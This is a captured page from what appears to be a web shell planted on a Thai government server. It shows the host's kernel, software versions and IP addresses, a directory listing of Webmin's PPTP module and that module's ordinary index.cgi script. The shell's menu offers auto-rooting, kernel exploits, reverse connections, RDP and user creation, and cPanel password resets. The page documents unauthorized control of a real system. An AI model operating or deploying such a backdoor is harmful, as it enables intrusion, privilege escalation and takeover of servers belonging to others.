Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
pptp-server /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
213
B
-rw-r--r--
acl_security.pl
521
B
-rwxr-xr-x
apply.cgi
283
B
-rwxr-xr-x
backup_config.pl
743
B
-rwxr-xr-x
config
148
B
-rw-r--r--
config-debian-linux
254
B
-rw-r--r--
config-mandrake-linux
206
B
-rw-r--r--
config-open-linux
224
B
-rw-r--r--
config-suse-linux
214
B
-rw-r--r--
config-syno-linux
148
B
-rw-r--r--
config-trustix-linux
214
B
-rw-r--r--
config-united-linux
214
B
-rw-r--r--
config.info
445
B
-rw-r--r--
config.info.ca
505
B
-rw-r--r--
config.info.ca.UTF-8
509
B
-rw-r--r--
config.info.de
506
B
-rw-r--r--
config.info.de.UTF-8
506
B
-rw-r--r--
config.info.es
478
B
-rw-r--r--
config.info.es.UTF-8
479
B
-rw-r--r--
config.info.fr
0
B
-rw-r--r--
config.info.nl
504
B
-rw-r--r--
config.info.nl.UTF-8
504
B
-rw-r--r--
config.info.no
495
B
-rw-r--r--
config.info.no.UTF-8
495
B
-rw-r--r--
config.info.pt_BR
516
B
-rw-r--r--
config.info.pt_BR.UTF-8
528
B
-rw-r--r--
defaultacl
50
B
-rw-r--r--
delete_secrets.cgi
524
B
-rwxr-xr-x
disc.cgi
507
B
-rwxr-xr-x
edit_conf.cgi
2.9
KB
-rwxr-xr-x
edit_options.cgi
4.44
KB
-rwxr-xr-x
edit_secret.cgi
2.99
KB
-rwxr-xr-x
index.cgi
2.72
KB
-rwxr-xr-x
install_check.pl
441
B
-rwxr-xr-x
list_conns.cgi
1.1
KB
-rwxr-xr-x
list_secrets.cgi
1.76
KB
-rwxr-xr-x
log_parser.pl
479
B
-rwxr-xr-x
module.info
216
B
-rw-r--r--
module.info.ca
151
B
-rw-r--r--
module.info.ca.UTF-8
163
B
-rw-r--r--
module.info.cz
24
B
-rw-r--r--
module.info.cz.UTF-8
30
B
-rw-r--r--
module.info.es
26
B
-rw-r--r--
module.info.es.UTF-8
32
B
-rw-r--r--
module.info.ms_MY
142
B
-rw-r--r--
module.info.ms_MY.UTF-8
154
B
-rw-r--r--
module.info.nl
24
B
-rw-r--r--
module.info.nl.UTF-8
30
B
-rw-r--r--
module.info.no
24
B
-rw-r--r--
module.info.no.UTF-8
30
B
-rw-r--r--
module.info.pt_BR
29
B
-rw-r--r--
module.info.pt_BR.UTF-8
35
B
-rw-r--r--
pptp-server-lib.pl
6.14
KB
-rwxr-xr-x
save_conf.cgi
1.55
KB
-rwxr-xr-x
save_options.cgi
2.56
KB
-rwxr-xr-x
save_secret.cgi
1.48
KB
-rwxr-xr-x
secrets-lib.pl
1.64
KB
-rwxr-xr-x
start.cgi
413
B
-rwxr-xr-x
stop.cgi
456
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Display the current PPTP configuration require './pptp-server-lib.pl'; # Check if it is installed if (!&has_command($config{'pptpd'}) || !($vers = &get_pptpd_version(\$out))) { &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); print "<p>",&text('index_epptpd', "<tt>$config{'pptpd'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; if ($out) { print &text('index_ver', "$config{'pptpd'} -v"),"\n"; print "<pre>$out</pre>\n"; } } else { # Show the title and version &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1, 0, &help_search_link("pptp", "man", "doc"), undef, undef, &text('index_version', $vers)); if (!-r $config{'file'}) { # Check for the config file print "<p>",&text('index_econfig', "<tt>$config{'file'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; } elsif (!&has_command("pppd")) { # Check for PPPd print "<p>",&text('index_epppd', "<tt>pppd</tt>"),"<p>\n"; } else { # Show table of options if ($access{'conf'}) { push(@links, "edit_conf.cgi"); push(@images, "images/conf.gif"); push(@titles, $text{'conf_title'}); } if ($access{'options'}) { push(@links, "edit_options.cgi"); push(@images, "images/options.gif"); push(@titles, $text{'options_title'}); } if ($access{'secrets'}) { push(@links, "list_secrets.cgi"); push(@images, "images/secrets.gif"); push(@titles, $text{'secrets_title'}); } if ($access{'conns'}) { push(@links, "list_conns.cgi"); push(@images, "images/conns.gif"); push(@titles, $text{'conns_title'}); } &icons_table(\@links, \@titles, \@images); # Start or stop/apply buttons print &ui_hr(); print &ui_buttons_start(); $pid = &get_pptpd_pid(); if ($access{'apply'}) { if ($pid && kill(0, $pid)) { print &ui_buttons_row("apply.cgi", $text{'index_apply'}, $text{'index_applydesc'}); if ($access{'stop'}) { print &ui_buttons_row("stop.cgi", $text{'index_stop'}, $text{'index_stopdesc'}); } } else { print &ui_buttons_row("start.cgi", $text{'index_start'}, $text{'index_startdesc'}); } } print &ui_buttons_end(); } } &ui_print_footer("/", $text{'index'}); sub ip_table { local @ips = split(/,/, &find($_[0], $conf)); print "<tr> <td valign=top><b>",$text{'index_'.$_[0]}, "</b></td> <td colspan=3>\n"; print "<textarea name=$_[0] rows=3 cols=50>", join("\n", @ips),"</textarea>\n"; print "</td> </tr>\n"; }
Close